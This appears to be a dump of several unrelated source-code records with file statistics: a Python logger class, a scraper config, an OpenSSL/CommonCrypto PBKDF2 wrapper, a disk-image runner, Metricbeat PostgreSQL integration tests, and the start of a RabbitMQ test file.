if hasattr(self, 'sysinfo') is False:
self.sysinfo = Sysinfo(self)
# Initialize header instance when not exists.
if hasattr(self, 'header') is False:
self.header = Header(self)
pass
def write(self, record):
"""Direct write to the output.
Parameters
----------
record : Record
The argument is used to send it to the output `root`.
"""
self.__check_file_stats()
self.root.write(record)
pass
def record(self, rectype, message, error=False, **kwargs):
"""Basic method to write records.
Parameters
----------
rectype : str
By default method creates the record with the type NONE.
That can be changed but depends on available record types.
All registered record types are stored in the instance attribute
rectypes. If you wish to use own record type or change the
presentaion of exeisting one then edit this dictinary.
message : str
The message that must be written.
error : bool, optional
If record is error then set that parameter to `True`.
**kwargs
The keyword arguments used for additional forms (variables) for
record and message formatting.
"""
if self.filters.get(rectype, True) is True:
record = Record(self, rectype, message, error=error, **kwargs)
self.write(record)
pass
def info(self, message, **kwargs):
"""Send INFO record to output."""
rectype = 'info'
self.record(rectype, message, **kwargs)
pass
def debug(self, message, **kwargs):
"""Send DEBUG record to the output."""
rectype = 'debug'
self.record(rectype, message, **kwargs)
pass
def error(self, message=None, rectype='error', format=None, alarming=False,
level=1, **kwargs):
"""Send ERROR record to the output.
If exception in current traceback exists then method will format the
exception according to `formatter.error` string presentation. If
`formatter.error` is set to `False` the exception will be just printed
in original Python style.
Also method will send an alarm if alarming attribute is `True`, email
output is enabled and SMTP server is configurated.
If one of the limit triggers worked then application will be aborted.
Parameters
----------
message : str, optional
The message that must be written instead of exception.
rectype : str, optional
The type of error according to `rectypes` dictionary.
format : str, optional
The format of the error message.
alarming : bool
The argument is used to enable or disable the alarming mechanism
for this certain call.
level : int
The argument is used to describe the error level.
**kwargs
The keyword arguments used for additional forms (variables) for
record and message formatting.
"""
self._with_error = True
self._count_errors += 1
format = self.formatter.error if format is None else format
# Parse the error.
err_type, err_value, err_tb = sys.exc_info()
if message is None and err_type is not None:
if isinstance(format, str) is True:
err_name = err_type.__name__
err_value = err_value
for tb in traceback.walk_tb(err_tb):
f_code = tb[0].f_code
err_file = os.path.abspath(f_code.co_filename)
err_line = tb[1]
err_obj = f_code.co_name
self.record(rectype, message, error=True,
err_name=err_name, err_value=err_value,
err_file=err_file, err_line=err_line,
err_obj=err_obj, **kwargs)
elif format is False:
exception = traceback.format_exception(err_type, err_value,
err_tb)
message = '\n'
message += ''.join(exception)
self.record(rectype, message, **kwargs)
else:
message = message or ''
self.record(rectype, message, **kwargs)
# Break execution in case of critical error if permitted.
# The alarm will be generated at exit if it is configured.
if self._control is True:
if level >= self._maxlevel:
sys.exit()
if self._maxerrors is not False:
if self._count_errors > self._maxerrors:
sys.exit()
# Send alarm if execution was not aborted but alarm is needed.
if alarming is True:
self.root.email.alarm()
pass
def warning(self, message=None, **kwargs):
"""Send WARNING error record to the output."""
self.error(message, rectype='warning', level=0, **kwargs)
pass
def critical(self, message=None, **kwargs):
"""Send CRITICAL error record to the output."""
self.error(message, rectype='critical', level=2, **kwargs)
pass
def head(self):
"""Send header to the output."""
string = self.header.create()
self.write(string)
pass
def subhead(self, string):
"""Send subheader as upper-case text between two border lines to the
output.
Parameters
----------
string : str
The text that will be presented as subheader.
"""
bound = f'{self.formatter.div*self.formatter.length}\n'
string = f'{bound}\t{string}\n{bound}'.upper()
self.write(string)
pass
def line(self, message):
"""Send raw text with the new line to the output.
Parameters
----------
message : str
The message that must be written.
"""
self.write(f'{message}\n')
pass
def bound(self, div=None, length=None):
"""Write horizontal border in the output. Useful when need to separate
different blocks of information.
Parameters
----------
div : str, optional
Symbol that is used to bulid the bound.
length : int, optional
Lenght of the bound.
"""
border = self.formatter.div * self.formatter.length
self.write(border + '\n')
pass
def blank(self, number=1):
"""Write blank lines in the output.
Parameters
----------
number : int, optional
The number of the blank lines that must be written.
"""
string = '\n'*number
self.write(string)
pass
def ok(self, **kwargs):
"""Print INFO message with OK."""
rectype = 'info'
message = self.messages['ok']
self.record(rectype, message, **kwargs)
pass
def success(self, **kwargs):
"""Print INFO message with SUCCESS."""
rectype = 'info'
message = self.messages['success']
self.record(rectype, message, **kwargs)
pass
def fail(self, **kwargs):
"""Print INFO message with FAIL."""
rectype = 'info'
message = self.messages['fail']
self.record(rectype, message, **kwargs)
pass
def restart(self):
"""Restart logging. Will open new file."""
self._start_date = dt.datetime.now()
self.__calculate_restart_date()
if self.root.file.status is True:
self.root.file.new()
if self.header.used is True:
self.head()
pass
def send(self, *args, **kwargs):
"""Send email message. Note that SMTP server connection must be
configured.
"""
self.root.email.send(*args, **kwargs)
pass
def set(self, **kwargs):
    """Update values in the table.

    Note that the DB connection must be configured; keyword arguments
    are forwarded to the root table writer unchanged.
    """
    self.root.table.write(**kwargs)
def _exit(self):
    # Fire the alarm email when alarming is enabled and the run
    # finished with an error; otherwise do nothing.
    if self._alarming is True and self._with_error is True:
        self.root.email.alarm()
def __calculate_restart_date(self):
    """Compute the date at which the logger must be restarted,
    derived from the start date plus the ``maxdays`` parameter.
    """
    lifetime = dt.timedelta(days=self._maxdays)
    self.__restart_date = self._start_date + lifetime
def __check_file_stats(self):
    """Check the output file statistics to catch when the current file
    must be closed and a new one must be opened.
    """
    # Nothing to do unless file output is active.
    if self.root.file.status is not True:
        return
    # Size-based rotation.
    if self._maxsize is not False:
        size = self.root.file.size
        if size is not None and size > self._maxsize:
            self.restart()
            return
    # Age-based rotation.
    if self._maxdays is not False:
        # NOTE(review): this compares only the day-of-month of the
        # scheduled restart date with today's day-of-month -- confirm
        # this is the intended trigger condition.
        if self.__restart_date.day == dt.datetime.now().day:
            self.restart()
            return
| 39.348554
| 79
| 0.592952
| 3,127
| 25,852
| 4.856092
| 0.1244
| 0.041291
| 0.047942
| 0.062693
| 0.394929
| 0.349687
| 0.314587
| 0.276984
| 0.265789
| 0.259862
| 0
| 0.001947
| 0.324501
| 25,852
| 656
| 80
| 39.408537
| 0.867606
| 0.492999
| 0
| 0.224806
| 0
| 0
| 0.032819
| 0.006209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108527
| false
| 0.085271
| 0.054264
| 0.003876
| 0.197674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a89b2893b587e6d66f6aa207ca89999bce84710
| 846
|
py
|
Python
|
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
utils/config.py
|
jtr109/Alpha2kindle
|
a411d05cafa9036a732eeb75fa13f68963f254e3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
class BaseConf(object):
    """Base configuration shared by all environments.

    Provides default HTTP request headers that mimic a desktop Chrome
    browser.
    """

    HEADERS = {
        "User-Agent": ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) "
                       "AppleWebKit/537.36 (KHTML, like Gecko) "
                       "Chrome/55.0.2883.95 "
                       "Safari/537.36"),
        "Accept": ("text/html,application/xhtml+xml,application/xml;"
                   "q=0.9,image/webp,*/*;"
                   "q=0.8"),
        "Accept-Encoding": "gzip, deflate, sdch, br",
        "Accept-Language": "zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
        "Cache-Control": "max-age=0",
    }
class TestConf(BaseConf):
    """Test-environment configuration.

    Builds the Redis connection URL from the ``REDIS_PWD`` environment
    variable; the password renders as ``None`` when the variable is
    unset.
    """

    REDIS_URL = "redis://:{password}@{hostname}:{port}/{db_number}".format(
        password=os.environ.get("REDIS_PWD"),
        hostname='127.0.0.1',
        port=6379,
        db_number=0,
    )


# The configuration class the application actually uses.
CURCONF = TestConf
| 27.290323
| 75
| 0.51773
| 110
| 846
| 3.927273
| 0.663636
| 0.023148
| 0.013889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082631
| 0.299054
| 846
| 30
| 76
| 28.2
| 0.645868
| 0.024823
| 0
| 0
| 0
| 0.045455
| 0.470231
| 0.185905
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.090909
| 0.045455
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6aa62343269180c72e1026d8bfdc9d3fa9196b1e
| 7,448
|
py
|
Python
|
gluon/contrib/pbkdf2_ctypes.py
|
Cwlowe/web2py
|
6ae4c3c274be1026cbc45b0fcd8d1180c74b9070
|
[
"BSD-3-Clause"
] | 9
|
2018-04-19T05:08:30.000Z
|
2021-11-23T07:36:58.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 98
|
2017-11-02T19:00:44.000Z
|
2022-03-22T16:15:39.000Z
|
gluon/contrib/pbkdf2_ctypes.py
|
mohit3011/Quiz-Mate
|
17988a623abde439aef2b43fc8dc3162b5cae15e
|
[
"BSD-3-Clause"
] | 9
|
2017-10-24T21:53:36.000Z
|
2021-11-23T07:36:59.000Z
|
# -*- coding: utf-8 -*-
"""
pbkdf2_ctypes
~~~~~~
Fast pbkdf2.
This module implements pbkdf2 for Python using crypto lib from
openssl or commoncrypto.
Note: This module is intended as a plugin replacement of pbkdf2.py
by Armin Ronacher.
Git repository:
$ git clone https://github.com/michele-comitini/pbkdf2_ctypes.git
:copyright: Copyright (c) 2013: Michele Comitini <mcm@glisco.it>
:license: LGPLv3
"""
import ctypes
import ctypes.util
import hashlib
import platform
import os.path
import binascii
import sys
# Public API of this module and its version string.
__all__ = ['pkcs5_pbkdf2_hmac', 'pbkdf2_bin', 'pbkdf2_hex']
__version__ = '0.99.3'
def _commoncrypto_hashlib_to_crypto_map_get(hashfunc):
    """Map a hashlib constructor to the CommonCrypto PRF constant.

    Raises
    ------
    ValueError
        If *hashfunc* is not one of the supported hashlib digests.
    """
    hashlib_to_crypto_map = {hashlib.sha1: 1,
                             hashlib.sha224: 2,
                             hashlib.sha256: 3,
                             hashlib.sha384: 4,
                             hashlib.sha512: 5}
    crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
    if crypto_hashfunc is None:
        # Fixed typo in the error message ("Unkwnown" -> "Unknown").
        raise ValueError('Unknown digest %s' % hashfunc)
    return crypto_hashfunc
def _commoncrypto_pbkdf2(data, salt, iterations, digest, keylen):
    """Common Crypto compatible wrapper around CCKeyDerivationPBKDF.

    Returns a ``(status, buffer)`` tuple: CommonCrypto returns 0 on
    success, so ``status`` is ``1 - ret`` (truthy on success) and
    ``buffer`` holds the derived key bytes.
    """
    prf = ctypes.c_uint32(_commoncrypto_hashlib_to_crypto_map_get(digest))
    password = ctypes.c_char_p(data)
    password_len = ctypes.c_size_t(len(data))
    salt_buf = ctypes.c_char_p(salt)
    salt_len = ctypes.c_size_t(len(salt))
    rounds = ctypes.c_uint(iterations)
    key_len = ctypes.c_size_t(keylen)
    out = ctypes.create_string_buffer(keylen)
    fn = crypto.CCKeyDerivationPBKDF
    fn.restype = ctypes.c_int
    fn.argtypes = [ctypes.c_uint32,
                   ctypes.c_char_p, ctypes.c_size_t,
                   ctypes.c_char_p, ctypes.c_size_t,
                   ctypes.c_uint32, ctypes.c_uint,
                   ctypes.c_char_p, ctypes.c_size_t]
    # First argument 2 is the hardcoded PBKDF2 algorithm selector.
    ret = fn(2,
             password, password_len,
             salt_buf, salt_len,
             prf,
             rounds,
             out,
             key_len)
    return (1 - ret, out)
def _openssl_hashlib_to_crypto_map_get(hashfunc):
    """Map a hashlib constructor to the matching OpenSSL EVP digest.

    Returns the EVP_MD pointer produced by the matching
    ``crypto.EVP_*`` factory.

    Raises
    ------
    ValueError
        If *hashfunc* is not one of the supported hashlib digests.
    """
    hashlib_to_crypto_map = {hashlib.md5: crypto.EVP_md5,
                             hashlib.sha1: crypto.EVP_sha1,
                             hashlib.sha256: crypto.EVP_sha256,
                             hashlib.sha224: crypto.EVP_sha224,
                             hashlib.sha384: crypto.EVP_sha384,
                             hashlib.sha512: crypto.EVP_sha512}
    crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
    if crypto_hashfunc is None:
        # Fixed typo in the error message ("Unkwnown" -> "Unknown").
        raise ValueError('Unknown digest %s' % hashfunc)
    crypto_hashfunc.restype = ctypes.c_void_p
    return crypto_hashfunc()
def _openssl_pbkdf2(data, salt, iterations, digest, keylen):
    """OpenSSL compatible wrapper around PKCS5_PBKDF2_HMAC.

    Returns an ``(err, buffer)`` tuple; ``err`` follows the OpenSSL
    convention (non-zero on success) and ``buffer`` holds the derived
    key bytes.
    """
    evp_md = ctypes.c_void_p(_openssl_hashlib_to_crypto_map_get(digest))
    password = ctypes.c_char_p(data)
    password_len = ctypes.c_int(len(data))
    salt_buf = ctypes.c_char_p(salt)
    salt_len = ctypes.c_int(len(salt))
    rounds = ctypes.c_int(iterations)
    key_len = ctypes.c_int(keylen)
    out = ctypes.create_string_buffer(keylen)
    # C prototype:
    # int PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
    #                       const unsigned char *salt, int saltlen,
    #                       int iter, const EVP_MD *digest,
    #                       int keylen, unsigned char *out);
    fn = crypto.PKCS5_PBKDF2_HMAC
    fn.argtypes = [ctypes.c_char_p, ctypes.c_int,
                   ctypes.c_char_p, ctypes.c_int,
                   ctypes.c_int, ctypes.c_void_p,
                   ctypes.c_int, ctypes.c_char_p]
    fn.restype = ctypes.c_int
    err = fn(password, password_len,
             salt_buf, salt_len,
             rounds,
             evp_md,
             key_len,
             out)
    return (err, out)
try:  # check that we have proper OpenSSL or Common Crypto on the system.
    # Pick the native crypto library and the matching wrapper function
    # (_pbkdf2_hmac) for the current platform.
    system = platform.system()
    if system == 'Windows':
        # OpenSSL ships as libeay64/libeay32 depending on architecture.
        if platform.architecture()[0] == '64bit':
            libname = ctypes.util.find_library('libeay64')
            if not libname:
                raise OSError('Library not found')
            crypto = ctypes.CDLL(libname)
        else:
            libname = ctypes.util.find_library('libeay32')
            if not libname:
                raise OSError('Library libeay32 not found.')
            crypto = ctypes.CDLL(libname)
        _pbkdf2_hmac = _openssl_pbkdf2
        crypto.PKCS5_PBKDF2_HMAC  # test compatibility
    elif system == 'Darwin':  # think different(TM)! i.e. break things!
        # CommonCrypto's CCKeyDerivationPBKDF needs OS X >= 10.7.
        if [int(x) for x in platform.mac_ver()[0].split('.')] < [10, 7, 0]:
            raise OSError('OS X Version too old %s < 10.7.0' % platform.mac_ver()[0])
        libname = ctypes.util.find_library('System')
        if not libname:
            raise OSError('Library not found')
        crypto = ctypes.CDLL(os.path.basename(libname))
        _pbkdf2_hmac = _commoncrypto_pbkdf2
    else:
        # Generic Unix: plain OpenSSL libcrypto.
        libname = ctypes.util.find_library('crypto')
        if not libname:
            raise OSError('Library crypto not found.')
        crypto = ctypes.CDLL(os.path.basename(libname))
        _pbkdf2_hmac = _openssl_pbkdf2
        crypto.PKCS5_PBKDF2_HMAC  # test compatibility
except (OSError, AttributeError):
    # Re-raise as ImportError so importing this module fails cleanly
    # when no usable crypto library exists.
    _, e, _ = sys.exc_info()
    raise ImportError('Cannot find a compatible cryptographic library '
                      'on your system. %s' % e)
def pkcs5_pbkdf2_hmac(data, salt, iterations=1000, keylen=24, hashfunc=None):
    """Derive a *keylen*-byte PBKDF2-HMAC key from *data* and *salt*.

    ``hashfunc`` defaults to ``hashlib.sha1``.

    Raises
    ------
    ValueError
        If the underlying crypto library reports failure.
    """
    digest = hashlib.sha1 if hashfunc is None else hashfunc
    err, buff = _pbkdf2_hmac(data, salt, iterations, digest, keylen)
    if err == 0:
        raise ValueError('wrong parameters')
    return buff.raw[:keylen]
def pbkdf2_hex(data, salt, iterations=1000, keylen=24, hashfunc=None):
    """Like :func:`pbkdf2_bin`, but return the derived key hex-encoded."""
    raw = pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc)
    return binascii.hexlify(raw)
def pbkdf2_bin(data, salt, iterations=1000, keylen=24, hashfunc=None):
    """Compatibility alias for :func:`pkcs5_pbkdf2_hmac`."""
    return pkcs5_pbkdf2_hmac(data, salt,
                             iterations=iterations,
                             keylen=keylen,
                             hashfunc=hashfunc)
if __name__ == '__main__':
    # Self-test / demo: print the OpenSSL version (best effort), then
    # derive and print a key for each supported digest.
    try:
        crypto.SSLeay_version.restype = ctypes.c_char_p
        print(crypto.SSLeay_version(0))
    except:
        # Best-effort only: CommonCrypto has no SSLeay_version.
        pass
    import platform
    if platform.python_version_tuple() < ('3', '0', '0'):
        # Python 2 shim: bytes('secret', 'utf-8') -> plain str.
        def bytes(*args):
            return str(args[0])
    for h in [hashlib.sha1, hashlib.sha224, hashlib.sha256,
              hashlib.sha384, hashlib.sha512]:
        print(binascii.hexlify(pkcs5_pbkdf2_hmac(bytes('secret', 'utf-8') * 11,
                                                 bytes('salt', 'utf-8'),
                                                 hashfunc=h)))
| 38.194872
| 88
| 0.569683
| 850
| 7,448
| 4.732941
| 0.223529
| 0.0609
| 0.041014
| 0.032811
| 0.49043
| 0.434999
| 0.338553
| 0.338553
| 0.272682
| 0.222719
| 0
| 0.034061
| 0.341702
| 7,448
| 194
| 89
| 38.391753
| 0.786457
| 0.116273
| 0
| 0.309353
| 0
| 0
| 0.054685
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.05036
| 0.064748
| 0.021583
| 0.179856
| 0.014388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac1a5f132a19c0dca01d22ddfd3613255dba8b5
| 4,258
|
py
|
Python
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 3
|
2019-07-25T03:24:23.000Z
|
2021-06-23T14:01:34.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 1
|
2019-12-20T16:04:19.000Z
|
2019-12-20T16:04:19.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 2
|
2019-07-25T03:24:26.000Z
|
2021-02-14T05:27:11.000Z
|
#!/usr/bin/env python3
#
# Create disk image
#
import re, sys, traceback
from .tasks import task_fetch_partitions, task_refresh_partitions, task_mount, task_remove_persistent_rules, task_remove_logs, task_fsck, task_shrink_partition, task_expand_partition, task_unmount
from .partclone_tasks import task_create_disk_image
from .ops_ui import console_ui
from ..components.disk import create_storage_instance
from .runner import Runner
from ..lib.disk_images import make_disk_image_name
from .json_ui import json_ui
from ..lib.util import init_triage_logger, is_block_device
# Runner states: "Waiting", "Prepare", "Preflight", "Running", "Success", "Failed"
# Message catalog keyed by runner state; passed to json_ui below as the
# message_catalog for progress reporting.
my_messages = { "Waiting": "Saving disk is waiting.",
                "Prepare": "Saving disk is preparing.",  # fixed user-facing typo "Savign"
                "Preflight": "Saving disk is preparing.",
                "Running": "{step} of {steps}: Running {task}",
                "Success": "Saving disk completed successfully.",
                "Failed": "Saving disk failed." }
#
class ImageDiskRunner(Runner):
    '''Runner for creating disk image. does fsck, shrink partition, create disk
    image and resize the file system back to the max.
    For now, this is only dealing with the EXT4 linux partition.
    '''
    # FIXME: If I want to make this to a generic clone app, I need to deal with all of partitions on the disk.
    # One step at a time.

    def __init__(self, ui, runner_id, disk, destdir, suggestedname=None, partition_id='Linux'):
        # ui: UI object (console_ui or json_ui) used for progress reporting.
        # runner_id: identifier for this runner (the device name in __main__).
        # disk: storage instance whose partition will be imaged.
        # destdir: directory receiving the image file.
        # suggestedname: optional base name for the image file.
        # partition_id: which partition on the disk to image.
        super().__init__(ui, runner_id)
        self.time_estimate = 600  # presumably a whole-run estimate in seconds -- confirm in Runner
        self.disk = disk
        self.partition_id = partition_id
        self.destdir = destdir
        self.imagename = make_disk_image_name(destdir, suggestedname)
        pass

    def prepare(self):
        # Build the ordered task list: fetch/refresh partitions, mount,
        # scrub persistent rules and logs, fsck, shrink, image, then
        # expand back. Order matters.
        super().prepare()
        # self.tasks.append(task_mount_nfs_destination(self, "Mount the destination volume"))
        self.tasks.append(task_fetch_partitions("Fetch partitions", self.disk))
        self.tasks.append(task_refresh_partitions("Refresh partition information", self.disk))
        self.tasks.append(task_mount("Mount the target disk", disk=self.disk, partition_id=self.partition_id))
        self.tasks.append(task_remove_persistent_rules("Remove persistent rules", disk=self.disk, partition_id=self.partition_id))
        self.tasks.append(task_remove_logs("Remove/Clean Logs", disk=self.disk, partition_id=self.partition_id))
        # NOTE(review): set_teardown_task presumably marks the task to
        # run during cleanup even on failure -- confirm in tasks module.
        task = task_unmount("Unmount target", disk=self.disk, partition_id=self.partition_id)
        task.set_teardown_task()
        self.tasks.append(task)
        self.tasks.append(task_fsck("fsck partition", disk=self.disk, partition_id=self.partition_id))
        self.tasks.append(task_shrink_partition("Shrink partition to smallest", disk=self.disk, partition_id=self.partition_id))
        self.tasks.append(task_create_disk_image("Create disk image", disk=self.disk, partition_id=self.partition_id, imagename=self.imagename))
        task = task_expand_partition("Expand the partion back", disk=self.disk, partition_id=self.partition_id)
        task.set_teardown_task()
        self.tasks.append(task)
        pass
    pass
if __name__ == "__main__":
    # CLI entry: <prog> devicename partition_id destdir
    tlog = init_triage_logger()

    if len(sys.argv) == 1:
        print('Unloader: devicename part destdir')
        sys.exit(0)
        # NOTREACHED

    devname = sys.argv[1]
    if not is_block_device(devname):
        print('%s is not a block device.' % devname)
        sys.exit(1)
        # NOTREACHED

    part = sys.argv[2]     # This is a partition id
    destdir = sys.argv[3]  # Destination directory
    disk = create_storage_instance(devname)

    # Preflight is for me to see the tasks. http server runs this with json_ui.
    do_it = True
    if destdir == "preflight":
        ui = console_ui()
        do_it = False
    elif destdir == "testflight":
        ui = console_ui()
        do_it = True
    else:
        ui = json_ui(wock_event="saveimage", message_catalog=my_messages)

    # BUG FIX: re.match(pattern, string) -- the original had the
    # arguments swapped (re.match(part, '\d+')), so a numeric partition
    # id was never converted to int.
    if re.match(r'\d+', part):
        part = int(part)

    runner_id = disk.device_name
    runner = ImageDiskRunner(ui, runner_id, disk, destdir, partition_id=part)
    try:
        runner.prepare()
        runner.preflight()
        runner.explain()
        runner.run()
        sys.exit(0)
        # NOTREACHED
    except Exception:
        # BUG FIX: traceback.format_exc() takes an optional `limit`
        # argument, not the exception object; the current exception is
        # taken from the interpreter state implicitly.
        sys.stderr.write(traceback.format_exc() + "\n")
        sys.exit(1)
        # NOTREACHED
| 35.190083
| 196
| 0.711837
| 593
| 4,258
| 4.903879
| 0.284992
| 0.079436
| 0.067056
| 0.071871
| 0.237276
| 0.18088
| 0.162311
| 0.162311
| 0.149243
| 0.134801
| 0
| 0.003726
| 0.180601
| 4,258
| 120
| 197
| 35.483333
| 0.829751
| 0.155707
| 0
| 0.27381
| 0
| 0
| 0.142457
| 0
| 0
| 0
| 0
| 0.008333
| 0
| 1
| 0.02381
| false
| 0.130952
| 0.107143
| 0
| 0.142857
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac3c0aa131a8fbf4b061367a8fbb2e23790a4c8
| 3,777
|
py
|
Python
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2021-02-02T14:18:40.000Z
|
2022-03-20T15:07:30.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2021-03-10T05:38:32.000Z
|
2021-08-16T13:11:19.000Z
|
import metricbeat
import os
import pytest
import sys
import unittest
class Test(metricbeat.BaseTest):
    """Integration tests for the Metricbeat PostgreSQL module."""

    # Docker compose services these tests require.
    COMPOSE_SERVICES = ['postgresql']

    def common_checks(self, output):
        """Assertions shared by every metricset test below."""
        # Ensure no errors or warnings exist in the log.
        self.assert_no_logged_warnings()
        for evt in output:
            # Every event carries the common fields plus "postgresql".
            top_level_fields = metricbeat.COMMON_FIELDS + ["postgresql"]
            self.assertCountEqual(self.de_dot(top_level_fields), evt.keys())
            self.assert_fields_are_documented(evt)

    def get_hosts(self):
        """Return ([dsn], username, password) for the compose service."""
        username = "postgres"
        host = self.compose_host()
        dsn = "postgres://{}?sslmode=disable".format(host)
        return (
            [dsn],
            username,
            os.getenv("POSTGRESQL_PASSWORD"),
        )

    @unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
    @pytest.mark.tag('integration')
    def test_activity(self):
        """
        PostgreSQL module outputs an event.
        """
        # Run the beat against the "activity" metricset and verify the
        # emitted event structure.
        hosts, username, password = self.get_hosts()
        self.render_config_template(modules=[{
            "name": "postgresql",
            "metricsets": ["activity"],
            "hosts": hosts,
            "username": username,
            "password": password,
            "period": "5s"
        }])
        proc = self.start_beat()
        self.wait_until(lambda: self.output_lines() > 0)
        proc.check_kill_and_wait()
        output = self.read_output_json()
        self.common_checks(output)
        for evt in output:
            assert "name" in evt["postgresql"]["activity"]["database"]
            assert "oid" in evt["postgresql"]["activity"]["database"]
            assert "state" in evt["postgresql"]["activity"]

    @unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
    @pytest.mark.tag('integration')
    def test_database(self):
        """
        PostgreSQL module outputs an event.
        """
        # Same flow as test_activity, for the "database" metricset.
        hosts, username, password = self.get_hosts()
        self.render_config_template(modules=[{
            "name": "postgresql",
            "metricsets": ["database"],
            "hosts": hosts,
            "username": username,
            "password": password,
            "period": "5s"
        }])
        proc = self.start_beat()
        self.wait_until(lambda: self.output_lines() > 0)
        proc.check_kill_and_wait()
        output = self.read_output_json()
        self.common_checks(output)
        for evt in output:
            assert "name" in evt["postgresql"]["database"]
            assert "oid" in evt["postgresql"]["database"]
            assert "blocks" in evt["postgresql"]["database"]
            assert "rows" in evt["postgresql"]["database"]
            assert "conflicts" in evt["postgresql"]["database"]
            assert "deadlocks" in evt["postgresql"]["database"]

    @unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
    @pytest.mark.tag('integration')
    def test_bgwriter(self):
        """
        PostgreSQL module outputs an event.
        """
        # Same flow as test_activity, for the "bgwriter" metricset.
        hosts, username, password = self.get_hosts()
        self.render_config_template(modules=[{
            "name": "postgresql",
            "metricsets": ["bgwriter"],
            "hosts": hosts,
            "username": username,
            "password": password,
            "period": "5s"
        }])
        proc = self.start_beat()
        self.wait_until(lambda: self.output_lines() > 0)
        proc.check_kill_and_wait()
        output = self.read_output_json()
        self.common_checks(output)
        for evt in output:
            assert "checkpoints" in evt["postgresql"]["bgwriter"]
            assert "buffers" in evt["postgresql"]["bgwriter"]
            assert "stats_reset" in evt["postgresql"]["bgwriter"]
| 32.843478
| 76
| 0.581943
| 380
| 3,777
| 5.626316
| 0.247368
| 0.028064
| 0.084191
| 0.064546
| 0.697381
| 0.623012
| 0.579046
| 0.579046
| 0.579046
| 0.579046
| 0
| 0.00224
| 0.290707
| 3,777
| 114
| 77
| 33.131579
| 0.795819
| 0.041038
| 0
| 0.556818
| 0
| 0
| 0.182432
| 0.008164
| 0
| 0
| 0
| 0
| 0.170455
| 1
| 0.056818
| false
| 0.079545
| 0.056818
| 0
| 0.147727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac4ca9b00a8492410dc6166ad36ac8d64fdcffc
| 2,337
|
py
|
Python
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
